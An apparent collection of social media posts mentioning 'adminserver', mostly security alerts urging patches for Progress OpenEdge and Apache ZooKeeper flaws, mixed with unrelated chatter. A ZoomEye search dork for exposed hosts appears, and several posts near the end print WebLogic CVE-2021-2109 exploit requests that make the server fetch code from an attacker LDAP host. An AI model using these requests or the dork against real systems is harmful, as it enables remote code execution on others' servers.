CVE-2025-58457: Apache ZooKeeper: Insufficient Permission Check in AdminServer Snapshot/Restore Commands openwall.com/lists/oss-secur…

🚨🚨CVE-2025-7388 (CVSS 8.4): OpenEdge AdminServer is vulnerable to Remote Code Execution (RCE) via its Java RMI interface! Authenticated users can exploit weak input validation to inject & execute OS commands with AdminServer privileges. Search by vul.cve Filter👉vul.cve="CVE-2025-7388" ZoomEye Dork👉app="OpenEdge AdminServer" Over 1k exposed instances found. ZoomEye Link: zoomeye.ai/searchResult?q=YX… Refer: 1. community.progress.com/s/art… 2. hub.zoomeye.ai/detail/68be49… #RCE #ZoomEye #cybersecurity #infosec #OSINT

#ProgressSoftware: sanate vulnerabilità nel prodotto #OpenEdge #AdminServer Rischio: 🟡 Tipologia: 🔸 Remote Code Execution 🔗 acn.gov.it/portale/w/progres… 🔄 Aggiornamenti disponibili 🔄

Technical specifics and a proof-of-concept (PoC) exploit have been made available for a recently disclosed critical security flaw in Progress Software OpenEdge Authentication Gateway and AdminServer, which could be potentially exploited to bypass authentication protections.

⚠️ URGENT patch needed! Progress #OpenEdge Authentication #Gateway/AdminServer #vulnerability (CVE-2024-1403) allows authentication bypass. Proof-of-concept exploit is available. thehackernews.com/2024/03/pr… Update to supported versions ASAP. #hacking

#ALERT 🚨 ⚠️ URGENT patch needed, Progress OpenEdge Authentication Gateway/AdminServer vulnerability (CVE-2024-1403) allows authentication bypass. Proof-of-concept exploit is available. #cybersecurity more: thehackernews.com/2024/03/pr… Update to supported versions ASAP

URGENT patch needed! Progress OpenEdge Authentication Gateway/AdminServer #vulnerability (CVE-2024-1403) allows authentication bypass. Proof-of-concept exploit is available. Learn more: thehackernews.com/2024/03/pr… Update to supported versions ASAP.

OpenEdge Authentication Gateway及びAdminServerの脆弱性CVE-2024-1403に対応するPoC（攻撃の概念実証コード）が公開された。OpenEdgeがOSのローカル認証プロバイダを使用する構成の場合に発現。細工された認証情報を渡されることで認証が不正に成功する。 gbhackers.com/poc-exploit-re…

⚠️ URGENT patch needed! Progress OpenEdge Authentication Gateway/AdminServer #vulnerability (CVE-2024-1403) allows authentication bypass. Proof-of-concept exploit is available. Learn more: thehackernews.com/2024/03/pr… Update to supported versions ASAP. #hacking

⚠️ URGENT patch needed! Progress OpenEdge Authentication Gateway/AdminServer #vulnerability (CVE-2024-1403) allows authentication bypass. Proof-of-concept exploit is available. Learn more: thehackernews.com/2024/03/pr… Update to supported versions ASAP. #hacking

CVE-2024-1403 - In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified. #exploit #exploitpoc github.com/horizon3ai/CVE-20…

#Progress: rilevata una vulnerabilità, con gravità “critica”, in #OpenEdge #AuthenticationGateway e #AdminServer Rischio: 🟠 Tipologia: 🔸 Authentication Bypass 🔗csirt.gov.it/contenuti/vulne… 🔄 Aggiornamenti disponibili 🔄

Progress Software disclosed a vulnerability in its OpenEdge Authentication Gateway and AdminServer apps. #CVE-2024-1403 allows attackers to bypass authentication and access effected systems with arbitrary privileges. Learn more: runzero.com/blog/finding-pro… #runzero #rapidresponse

Our #ForestSchool made it into the Summer 2023 edition of #LewishamLife magazine! Read it here: file://adminserver/redirects$/Downloads/lelement.209/LewLifeSummer2023FinalWeb.pdf (we're on page 8 which is the 5th electronic page 🙂)

@dbasolved - after our upgrade of GG Microservices 19c to 21.3, we are getting a strange issue in adminserver, under the configuration tab, we are not able to connect to mining db due to 'OGG-08110 login failed certificate validation failure. Are you aware of any such issue.

#Oracle WebLogic Server RCE (CVE-2021-2109) [PoC] GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;[Semicolon]👈10:1389/5r5mu7;AdminServer-) packetstormsecurity.com/file…

最近スリープ解除してからWebDirectにつながらない現象に遭遇すること多し。adminserver は正常なので、wpeをstop,startしてみたがだめ。バックグラウンドプロセス再起動したら復活したけど、そこまでしなくてもよい方法を見つけたかった。

#Oracle WebLogic Server RCE (CVE-2021-2109) via JNDI [PoC] Photubias GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/hacked;AdminServer-)

#CVE-2021-2109(console) CVE-2020-14882(unauth) http://x.x.x.x:x/console/css/..//consolejndi.portal POST _pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://x.x.x;x:x/Basic/WeblogicEcho;AdminServer")

It's about the weblogic console adminserver port, I assume.